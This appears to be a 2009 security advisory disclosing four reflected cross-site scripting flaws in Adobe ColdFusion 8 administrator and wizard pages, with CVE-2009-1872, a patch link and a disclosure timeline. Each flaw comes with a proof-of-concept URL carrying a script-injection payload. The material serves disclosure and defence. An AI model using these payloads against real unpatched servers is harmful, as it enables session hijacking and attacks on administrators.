|
|
| |
Credit:
The information has been provided by Alexander Polyakov.
The original article can be found at: http://www.dsecrg.com/pages/vul/show.php?id=122
|
| |
Vulnerable Systems:
* Adobe Coldfusion 8
Immune Systems:
*
1. Multiple Linked XSS vulnerabilities found in Adobe Coldfusion Server 8.
1.1 Linked XSS vulnerability found in script searchlog.cfm. vulnerable parameter startRow
Example: http://localhost:8500/CFIDE/administrator/logviewer/searchlog.cfm?viewShort=0&sortBy=&filter=CurrentFilter&startRow=22%22%20%20STYLE=%22background-image:url(javascript:alert(%27%DF%20%E7%E4%E5%F1%FC%20%E1%FB%EB%27))%22%3E
1.2 Linked XSS vulnerability found in script _logintowizard.cfm. Attacker can inject XSS in url string
Example:
http://localhost:8500/CFIDE/wizards/common/_logintowizard.cfm?>'"><script>alert('DSECRG_XSS')</script>
1.3 Linked XSS vulnerability found in script _authenticatewizarduser.cfm. Attacker can inject XSS in url string
Example:
http://localhost:8500/CFIDE/wizards/common/_authenticatewizarduser.cfm?>'"><script>alert('DSECRG_XSS')</script>
1.4 Linked XSS vulnerability found in script _authenticatewizarduser.cfm.Attacker can inject XSS in url string
Example:
http://localhost:8500/CFIDE/administrator/enter.cfm?>'"><script>alert('DSECRG_XSS')</script>
Patch Availability:
The issue has been solved 17 August 2009.
http://www.adobe.com/go/apsb09-12
CVE Information:
CVE-2009-1872
Disclosure Timeline:
12.01.2009 Reported to vendor
17.08.2009 Date of advisory
|
|
|
